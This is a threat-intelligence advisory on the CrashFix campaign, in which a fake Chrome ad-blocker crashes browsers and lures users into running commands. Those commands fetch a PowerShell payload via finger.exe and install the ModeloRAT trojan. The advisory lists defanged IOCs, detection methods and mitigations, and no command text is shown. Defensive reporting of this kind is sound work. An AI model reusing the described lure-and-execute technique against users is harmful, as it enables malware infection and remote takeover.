CrashFix Malicious Browser Extension Campaign Leading to ModeloRAT Infections
January 23rd, 2026
High
Our Cyber Threat Intelligence Unit identified a sophisticated malicious campaign tracked as CrashFix abuses a trojanized browser extension to crash users’ web browsers and socially engineer them into executing harmful commands that ultimately lead to malware infection. The extension posed as a fake ad blocker called “NexShield – Advanced Web Guardian” and was downloaded from the official Chrome Web Store before removal. After installation, the extension intentionally imposes browser crashes and displays deceptive security warnings that prompt the user to execute attacker-supplied commands. These actions lead to the deployment of a previously undocumented Python-based Remote Access Trojan (RAT) named ModeloRAT on compromised machines. The activity demonstrates an evolution of ClickFix-style social engineering techniques that exploit user frustration to gain execution and persistence on Windows systems.
Technical Details
Attack Type: Malicious browser extension-based attack.
Severity: High.
Malware Campaign Name: CrashFix
Attack Vector: Malicious Chrome extension (“NexShield – Advanced Web Guardian”) impersonating a known ad blocker that deliberately crashes the browser.
Payload Delivery: Executing the malicious command leverages the Windows utility finger.exe to retrieve a PowerShell payload from attacker infrastructure. This payload leads to ModeloRAT deployment, which performs system reconnaissance, establishes persistence via the Registry, and enables remote control, command execution, and data exfiltration.
Delivery Method:
Malicious advertisement displayed during searches for ad blockers.
Redirection to a fake Chrome extension hosted on the official Chrome Web Store.
Extension masquerades as “NexShield Advanced Web Guardian”, a clone of uBlock Origin Lite.
Browser crash triggers fake security warning prompting users to manually execute attacker provided commands via Windows Run.
Impact
Users installing the malicious extension may be tricked into running arbitrary commands that install malware.
Infected systems may execute ModeloRAT, a fully-featured remote access trojan with persistence.
Domain-joined (corporate) systems are prioritized, enabling deeper network access and potential lateral movement.
Attackers can gather system information, maintain persistence, and execute arbitrary binaries or scripts.
The social engineering component undermines user trust in security warnings and extensions.
Malicious extensions may be installed en masse via deceptive advertising, highlighting supply-chain risks in browser add-ons.
Detection Method
Browser Extension Audit: Identify and remove untrusted or unfamiliar Chrome extensions, particularly “NexShield – Advanced Web Guardian.”
Resource Monitoring: Look for high browser CPU or memory usage spikes consistent with denial-of-service loops.
Clipboard Inspection: Alert on unanticipated malicious commands being copied to the user's clipboard following extension installation.
PowerShell Activity: Monitor PowerShell invocations initiated from Run dialog prompts without prior user authorization.
Process and Persistence Monitoring: Hunt for Python processes, registry persistence entries, and unusual network connections from newly installed extensions.
Network Traffic Analytics: Detect outbound connections to suspicious command-and-control domains or typo-squatted infrastructure used for tracking and payload delivery.
Indicators of Compromise
Indicators | Description |
IP Addresses | 170.168.103[.]208 158.247.252[.]178 199.217.98[.]108 |
Hashes | fbfce492d1aa458c0ccc8ce4611f0e2d00913c8d51b5016ce60a7f59db67de67 6399c686eba09584bbbb02f31d398ace333a2b57529059849ef97ce7c27752f4 c15f44d6abb3a2a882ffdc9b90f7bb5d1a233c0aa183eb765aa8bfba5832c8c6 c46af9ae6ab0e7567573dbc950a8ffbe30ea848fac90cd15860045fe7640199c |
Domain | nexsnield[.]com |
Recommendations
Remove Malicious Extensions: Uninstall unrecognized or suspicious extensions from all browsers.
Restrict Extension Installation: Only allow vetted extensions via enterprise allowlists on managed endpoints.
User Awareness: Educate users to avoid installing extensions from deceptive ads and never execute commands from untrusted warnings.
Endpoint Protection: Deploy and tune EDR solutions to detect abnormal PowerShell and LLMNR behaviors.
Clipboard Monitoring: Alert on suspicious clipboard changes preceding execution of commands via Run dialogs.
Network Controls: Block or monitor traffic to known malicious domains associated with CrashFix and ModeloRAT.
Conclusion
The KongTuke Crash Fix campaign demonstrates a sophisticated evolution of social engineering attacks by combining browser extension abuse, deliberate resource exhaustion, and user driven command execution. By impersonating a trusted open-source project and exploiting user frustration during browser crashes, threat actors have created a self-sustaining infection loop. The deployment of ModeloRAT on domain joined machines highlights a clear focus on corporate environments and long-term access. The campaign underscores the risks posed by malicious extensions even when distributed through legitimate platforms. Organizations must remain vigilant against browser-based threats that abuse trusted software and user behavior.